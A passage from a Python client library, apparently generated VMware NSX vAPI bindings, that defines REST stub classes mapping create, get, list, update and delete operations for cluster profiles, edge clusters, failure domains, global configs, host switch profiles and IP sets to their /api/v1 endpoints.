            'resource_type': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        update_input_type = type.StructType('operation-input', {
            'cluster_profile_id': type.StringType(),
            'cluster_profile': _profile_struct(),
        })

        # --- per-operation REST wire metadata --------------------------------
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/cluster-profiles',
            request_body_parameter='cluster_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
            path_variables={'cluster_profile_id': 'cluster-profile-id'},
            query_parameters={},
            content_type='application/json')
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
            path_variables={'cluster_profile_id': 'cluster-profile-id'},
            query_parameters={},
            content_type='application/json')
        # 'list' forwards each filter as a query parameter whose wire name
        # matches the Python parameter name.
        list_filter_names = [
            'cursor', 'include_system_owned', 'included_fields', 'page_size',
            'resource_type', 'sort_ascending', 'sort_by',
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/cluster-profiles',
            path_variables={},
            query_parameters={name: name for name in list_filter_names},
            content_type='application/json')
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/cluster-profiles/{cluster-profile-id}',
            request_body_parameter='cluster_profile',
            path_variables={'cluster_profile_id': 'cluster-profile-id'},
            query_parameters={},
            content_type='application/json')

        # (name, input type, output type, validate input, validate output,
        #  REST metadata) — validation applies wherever a dynamic
        #  ClusterProfile struct crosses the wire.
        op_specs = (
            ('create', create_input_type, _profile_struct(), True, True, create_rest_metadata),
            ('delete', delete_input_type, type.VoidType(), False, False, delete_rest_metadata),
            ('get', get_input_type, _profile_struct(), False, True, get_rest_metadata),
            ('list', list_input_type,
             type.ReferenceType('com.vmware.nsx.model_client', 'ClusterProfileListResult'),
             False, True, list_rest_metadata),
            ('update', update_input_type, _profile_struct(), True, True, update_rest_metadata),
        )
        operations = {}
        rest_metadata = {}
        for op_name, input_type, output_type, check_in, check_out, metadata in op_specs:
            operations[op_name] = {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()] if check_in else [],
                'output_validator_list': [HasFieldsOfValidator()] if check_out else [],
                'task_type': TaskType.NONE,
            }
            rest_metadata[op_name] = metadata
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.cluster_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ComputeCollectionTransportNodeTemplatesStub(ApiInterfaceStub):
    def __init__(self, config):
        """REST stub for the
        ``com.vmware.nsx.compute_collection_transport_node_templates`` service:
        CRUD operations on ComputeCollectionTransportNodeTemplate resources.
        """
        _MODEL = 'com.vmware.nsx.model_client'
        _STD_ERRORS = 'com.vmware.vapi.std.errors_client'

        def _std_error_dict():
            # Standard vAPI error set; identical for every operation of this service.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(_STD_ERRORS, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(_STD_ERRORS, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(_STD_ERRORS, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(_STD_ERRORS, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(_STD_ERRORS, 'NotFound'),
            }

        def _op(input_type, output_type, in_validators, out_validators):
            # Per-operation metadata record in the shape ApiInterfaceStub expects.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_error_dict(),
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        def _template_ref():
            # Fresh reference to the template model type (used for inputs and outputs).
            return type.ReferenceType(_MODEL, 'ComputeCollectionTransportNodeTemplate')

        operations = {
            'create': _op(
                type.StructType('operation-input', {
                    'compute_collection_transport_node_template': _template_ref(),
                }),
                _template_ref(),
                [HasFieldsOfValidator()],
                [HasFieldsOfValidator()],
            ),
            'delete': _op(
                type.StructType('operation-input', {
                    'template_id': type.StringType(),
                }),
                type.VoidType(),
                [],
                [],
            ),
            'get': _op(
                type.StructType('operation-input', {
                    'template_id': type.StringType(),
                }),
                _template_ref(),
                [],
                [HasFieldsOfValidator()],
            ),
            'list': _op(
                type.StructType('operation-input', {
                    'compute_collection_id': type.OptionalType(type.StringType()),
                }),
                type.ReferenceType(_MODEL, 'TransportNodeTemplateListResult'),
                [],
                [HasFieldsOfValidator()],
            ),
            'update': _op(
                type.StructType('operation-input', {
                    'template_id': type.StringType(),
                    'compute_collection_transport_node_template': _template_ref(),
                }),
                _template_ref(),
                [HasFieldsOfValidator()],
                [HasFieldsOfValidator()],
            ),
        }
        # HTTP mapping for every operation above.
        rest_metadata = {
            'create': OperationRestMetadata(
                http_method='POST',
                url_template='/api/v1/compute-collection-transport-node-templates',
                request_body_parameter='compute_collection_transport_node_template',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
            'delete': OperationRestMetadata(
                http_method='DELETE',
                url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
                path_variables={'template_id': 'template-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'get': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
                path_variables={'template_id': 'template-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'list': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/compute-collection-transport-node-templates',
                path_variables={},
                query_parameters={'compute_collection_id': 'compute_collection_id'},
                content_type='application/json'
            ),
            'update': OperationRestMetadata(
                http_method='PUT',
                url_template='/api/v1/compute-collection-transport-node-templates/{template-id}',
                request_body_parameter='compute_collection_transport_node_template',
                path_variables={'template_id': 'template-id'},
                query_parameters={},
                content_type='application/json'
            ),
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.compute_collection_transport_node_templates',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _EdgeClustersStub(ApiInterfaceStub):
    def __init__(self, config):
        """REST stub for the ``com.vmware.nsx.edge_clusters`` service:
        CRUD on EdgeCluster resources plus the replace-transport-node action.
        """
        _MODEL = 'com.vmware.nsx.model_client'
        _STD_ERRORS = 'com.vmware.vapi.std.errors_client'

        def _std_error_dict():
            # Standard vAPI error set; identical for every operation of this service.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(_STD_ERRORS, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(_STD_ERRORS, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(_STD_ERRORS, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(_STD_ERRORS, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(_STD_ERRORS, 'NotFound'),
            }

        def _op(input_type, output_type, in_validators, out_validators):
            # Per-operation metadata record in the shape ApiInterfaceStub expects.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_error_dict(),
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        def _cluster_ref():
            # Fresh reference to the EdgeCluster model type.
            return type.ReferenceType(_MODEL, 'EdgeCluster')

        operations = {
            'create': _op(
                type.StructType('operation-input', {
                    'edge_cluster': _cluster_ref(),
                }),
                _cluster_ref(),
                [HasFieldsOfValidator()],
                [HasFieldsOfValidator()],
            ),
            'delete': _op(
                type.StructType('operation-input', {
                    'edge_cluster_id': type.StringType(),
                }),
                type.VoidType(),
                [],
                [],
            ),
            'get': _op(
                type.StructType('operation-input', {
                    'edge_cluster_id': type.StringType(),
                }),
                _cluster_ref(),
                [],
                [HasFieldsOfValidator()],
            ),
            'list': _op(
                type.StructType('operation-input', {
                    'cursor': type.OptionalType(type.StringType()),
                    'included_fields': type.OptionalType(type.StringType()),
                    'page_size': type.OptionalType(type.IntegerType()),
                    'sort_ascending': type.OptionalType(type.BooleanType()),
                    'sort_by': type.OptionalType(type.StringType()),
                }),
                type.ReferenceType(_MODEL, 'EdgeClusterListResult'),
                [],
                [HasFieldsOfValidator()],
            ),
            'replacetransportnode': _op(
                type.StructType('operation-input', {
                    'edge_cluster_id': type.StringType(),
                    'edge_cluster_member_transport_node': type.ReferenceType(_MODEL, 'EdgeClusterMemberTransportNode'),
                }),
                _cluster_ref(),
                [],
                [HasFieldsOfValidator()],
            ),
            'update': _op(
                type.StructType('operation-input', {
                    'edge_cluster_id': type.StringType(),
                    'edge_cluster': _cluster_ref(),
                }),
                _cluster_ref(),
                [HasFieldsOfValidator()],
                [HasFieldsOfValidator()],
            ),
        }
        # HTTP mapping for every operation above.
        rest_metadata = {
            'create': OperationRestMetadata(
                http_method='POST',
                url_template='/api/v1/edge-clusters',
                request_body_parameter='edge_cluster',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
            'delete': OperationRestMetadata(
                http_method='DELETE',
                url_template='/api/v1/edge-clusters/{edge-cluster-id}',
                path_variables={'edge_cluster_id': 'edge-cluster-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'get': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/edge-clusters/{edge-cluster-id}',
                path_variables={'edge_cluster_id': 'edge-cluster-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'list': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/edge-clusters',
                path_variables={},
                query_parameters={
                    'cursor': 'cursor',
                    'included_fields': 'included_fields',
                    'page_size': 'page_size',
                    'sort_ascending': 'sort_ascending',
                    'sort_by': 'sort_by',
                },
                content_type='application/json'
            ),
            'replacetransportnode': OperationRestMetadata(
                http_method='POST',
                url_template='/api/v1/edge-clusters/{edge-cluster-id}?action=replace_transport_node',
                request_body_parameter='edge_cluster_member_transport_node',
                path_variables={'edge_cluster_id': 'edge-cluster-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'update': OperationRestMetadata(
                http_method='PUT',
                url_template='/api/v1/edge-clusters/{edge-cluster-id}',
                request_body_parameter='edge_cluster',
                path_variables={'edge_cluster_id': 'edge-cluster-id'},
                query_parameters={},
                content_type='application/json'
            ),
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.edge_clusters',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ErrorResolverStub(ApiInterfaceStub):
    def __init__(self, config):
        """REST stub for the ``com.vmware.nsx.error_resolver`` service:
        look up registered error resolvers and trigger error resolution.
        """
        _MODEL = 'com.vmware.nsx.model_client'
        _STD_ERRORS = 'com.vmware.vapi.std.errors_client'

        def _std_error_dict():
            # Standard vAPI error set; identical for every operation of this service.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(_STD_ERRORS, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(_STD_ERRORS, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(_STD_ERRORS, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(_STD_ERRORS, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(_STD_ERRORS, 'NotFound'),
            }

        def _op(input_type, output_type):
            # Per-operation metadata record; no validators apply to this service.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_error_dict(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'get': _op(
                type.StructType('operation-input', {
                    'error_id': type.StringType(),
                }),
                type.ReferenceType(_MODEL, 'ErrorResolverInfo'),
            ),
            'list': _op(
                type.StructType('operation-input', {}),
                type.ReferenceType(_MODEL, 'ErrorResolverInfoList'),
            ),
            'resolveerror': _op(
                type.StructType('operation-input', {
                    'error_resolver_metadata_list': type.ReferenceType(_MODEL, 'ErrorResolverMetadataList'),
                }),
                type.VoidType(),
            ),
        }
        # HTTP mapping for every operation above.
        rest_metadata = {
            'get': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/error-resolver/{error_id}',
                path_variables={'error_id': 'error_id'},
                query_parameters={},
                content_type='application/json'
            ),
            'list': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/error-resolver',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
            'resolveerror': OperationRestMetadata(
                http_method='POST',
                url_template='/api/v1/error-resolver?action=resolve_error',
                request_body_parameter='error_resolver_metadata_list',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.error_resolver',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _FailureDomainsStub(ApiInterfaceStub):
    def __init__(self, config):
        """REST stub for the ``com.vmware.nsx.failure_domains`` service:
        CRUD operations on FailureDomain resources.
        """
        _MODEL = 'com.vmware.nsx.model_client'
        _STD_ERRORS = 'com.vmware.vapi.std.errors_client'

        def _std_error_dict():
            # Standard vAPI error set; identical for every operation of this service.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(_STD_ERRORS, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(_STD_ERRORS, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(_STD_ERRORS, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(_STD_ERRORS, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(_STD_ERRORS, 'NotFound'),
            }

        def _op(input_type, output_type):
            # Per-operation metadata record; no validators apply to this service.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_error_dict(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        def _domain_ref():
            # Fresh reference to the FailureDomain model type.
            return type.ReferenceType(_MODEL, 'FailureDomain')

        operations = {
            'create': _op(
                type.StructType('operation-input', {
                    'failure_domain': _domain_ref(),
                }),
                _domain_ref(),
            ),
            'delete': _op(
                type.StructType('operation-input', {
                    'failure_domain_id': type.StringType(),
                }),
                type.VoidType(),
            ),
            'get': _op(
                type.StructType('operation-input', {
                    'failure_domain_id': type.StringType(),
                }),
                _domain_ref(),
            ),
            'list': _op(
                type.StructType('operation-input', {}),
                type.ReferenceType(_MODEL, 'FailureDomainListResult'),
            ),
            'update': _op(
                type.StructType('operation-input', {
                    'failure_domain_id': type.StringType(),
                    'failure_domain': _domain_ref(),
                }),
                _domain_ref(),
            ),
        }
        # HTTP mapping for every operation above.
        rest_metadata = {
            'create': OperationRestMetadata(
                http_method='POST',
                url_template='/api/v1/failure-domains',
                request_body_parameter='failure_domain',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
            'delete': OperationRestMetadata(
                http_method='DELETE',
                url_template='/api/v1/failure-domains/{failure-domain-id}',
                path_variables={'failure_domain_id': 'failure-domain-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'get': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/failure-domains/{failure-domain-id}',
                path_variables={'failure_domain_id': 'failure-domain-id'},
                query_parameters={},
                content_type='application/json'
            ),
            'list': OperationRestMetadata(
                http_method='GET',
                url_template='/api/v1/failure-domains',
                path_variables={},
                query_parameters={},
                content_type='application/json'
            ),
            'update': OperationRestMetadata(
                http_method='PUT',
                url_template='/api/v1/failure-domains/{failure-domain-id}',
                request_body_parameter='failure_domain',
                path_variables={'failure_domain_id': 'failure-domain-id'},
                query_parameters={},
                content_type='application/json'
            ),
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.failure_domains',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _GlobalConfigsStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.global_configs interface.

    Wires the get, list, resyncconfig and update operations to the
    /api/v1/global-configs REST endpoints.
    """
    def __init__(self, config):
        # Every operation on this interface declares the same five standard
        # vAPI errors; build a fresh mapping per operation.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # Dynamic-struct payload validated against the GlobalConfigs model;
        # used both as a request body and as the result type of
        # get/resyncconfig/update.
        def configs_struct():
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigs')])

        # ---- get operation ----
        get_input_type = type.StructType('operation-input', {
            'config_type': type.StringType(),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = [HasFieldsOfValidator()]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/global-configs/{config-type}',
            path_variables={'config_type': 'config-type'},
            query_parameters={},
            content_type='application/json')

        # ---- list operation ----
        list_input_type = type.StructType('operation-input', {})
        list_error_dict = std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = [HasFieldsOfValidator()]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/global-configs',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # ---- resyncconfig operation ----
        resyncconfig_input_type = type.StructType('operation-input', {
            'config_type': type.StringType(),
            'global_configs': configs_struct(),
        })
        resyncconfig_error_dict = std_errors()
        resyncconfig_input_value_validator_list = [HasFieldsOfValidator()]
        resyncconfig_output_validator_list = [HasFieldsOfValidator()]
        # Resync is modeled as a PUT with an action query baked into the
        # URL template.
        resyncconfig_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/global-configs/{config-type}?action=resync_config',
            request_body_parameter='global_configs',
            path_variables={'config_type': 'config-type'},
            query_parameters={},
            content_type='application/json')

        # ---- update operation ----
        update_input_type = type.StructType('operation-input', {
            'config_type': type.StringType(),
            'global_configs': configs_struct(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = [HasFieldsOfValidator()]
        update_output_validator_list = [HasFieldsOfValidator()]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/global-configs/{config-type}',
            request_body_parameter='global_configs',
            path_variables={'config_type': 'config-type'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': configs_struct(),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'GlobalConfigsListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'resyncconfig': {
                'input_type': resyncconfig_input_type,
                'output_type': configs_struct(),
                'errors': resyncconfig_error_dict,
                'input_value_validator_list': resyncconfig_input_value_validator_list,
                'output_validator_list': resyncconfig_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': configs_struct(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'resyncconfig': resyncconfig_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.global_configs',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _HostSwitchProfilesStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.host_switch_profiles interface.

    Provides create/delete/get/list/update over the
    /api/v1/host-switch-profiles REST endpoints.
    """
    def __init__(self, config):
        # Shared five-entry error map declared by every operation here.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # Polymorphic profile payload validated against BaseHostSwitchProfile;
        # used for create/update bodies and create/get/update results.
        def profile_struct():
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType('com.vmware.nsx.model_client', 'BaseHostSwitchProfile')])

        # ---- create operation ----
        create_input_type = type.StructType('operation-input', {
            'base_host_switch_profile': profile_struct(),
        })
        create_error_dict = std_errors()
        create_input_value_validator_list = [HasFieldsOfValidator()]
        create_output_validator_list = [HasFieldsOfValidator()]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/host-switch-profiles',
            request_body_parameter='base_host_switch_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # ---- delete operation ----
        delete_input_type = type.StructType('operation-input', {
            'host_switch_profile_id': type.StringType(),
        })
        delete_error_dict = std_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
            path_variables={'host_switch_profile_id': 'host-switch-profile-id'},
            query_parameters={},
            content_type='application/json')

        # ---- get operation ----
        get_input_type = type.StructType('operation-input', {
            'host_switch_profile_id': type.StringType(),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = [HasFieldsOfValidator()]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
            path_variables={'host_switch_profile_id': 'host-switch-profile-id'},
            query_parameters={},
            content_type='application/json')

        # ---- list operation ----
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'hostswitch_profile_type': type.OptionalType(type.StringType()),
            'include_system_owned': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'uplink_teaming_policy_name': type.OptionalType(type.StringType()),
        })
        list_error_dict = std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = [HasFieldsOfValidator()]
        # Each optional filter maps straight through to a same-named
        # query parameter.
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/host-switch-profiles',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'hostswitch_profile_type': 'hostswitch_profile_type',
                'include_system_owned': 'include_system_owned',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
                'uplink_teaming_policy_name': 'uplink_teaming_policy_name',
            },
            content_type='application/json')

        # ---- update operation ----
        update_input_type = type.StructType('operation-input', {
            'host_switch_profile_id': type.StringType(),
            'base_host_switch_profile': profile_struct(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = [HasFieldsOfValidator()]
        update_output_validator_list = [HasFieldsOfValidator()]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/host-switch-profiles/{host-switch-profile-id}',
            request_body_parameter='base_host_switch_profile',
            path_variables={'host_switch_profile_id': 'host-switch-profile-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': profile_struct(),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': profile_struct(),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'HostSwitchProfilesListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': profile_struct(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.host_switch_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _IpSetsStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.ip_sets interface.

    Provides create, create_0 (add/remove IP via ?action=...), delete,
    get, list and update over the /api/v1/ip-sets REST endpoints.
    """
    def __init__(self, config):
        # Standard five-error map shared by most operations; delete adds
        # ConcurrentChange and is spelled out separately below.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        ipset_ref = lambda: type.ReferenceType('com.vmware.nsx.model_client', 'IPSet')

        # ---- create operation ----
        create_input_type = type.StructType('operation-input', {
            'ip_set': ipset_ref(),
        })
        create_error_dict = std_errors()
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ip-sets',
            request_body_parameter='ip_set',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # ---- create_0 operation (POST an IPAddressElement with an action) ----
        create_0_input_type = type.StructType('operation-input', {
            'ip_set_id': type.StringType(),
            'ip_address_element': type.ReferenceType('com.vmware.nsx.model_client', 'IPAddressElement'),
            'action': type.StringType(),
        })
        create_0_error_dict = std_errors()
        create_0_input_value_validator_list = []
        create_0_output_validator_list = []
        create_0_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ip-sets/{ip-set-id}',
            request_body_parameter='ip_address_element',
            path_variables={'ip_set_id': 'ip-set-id'},
            query_parameters={'action': 'action'},
            content_type='application/json')

        # ---- delete operation ----
        delete_input_type = type.StructType('operation-input', {
            'ip_set_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        # delete uniquely also reports ConcurrentChange; keep the generated
        # entry order intact.
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.concurrent_change':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ip-sets/{ip-set-id}',
            path_variables={'ip_set_id': 'ip-set-id'},
            query_parameters={'force': 'force'},
            content_type='application/json')

        # ---- get operation ----
        get_input_type = type.StructType('operation-input', {
            'ip_set_id': type.StringType(),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ip-sets/{ip-set-id}',
            path_variables={'ip_set_id': 'ip-set-id'},
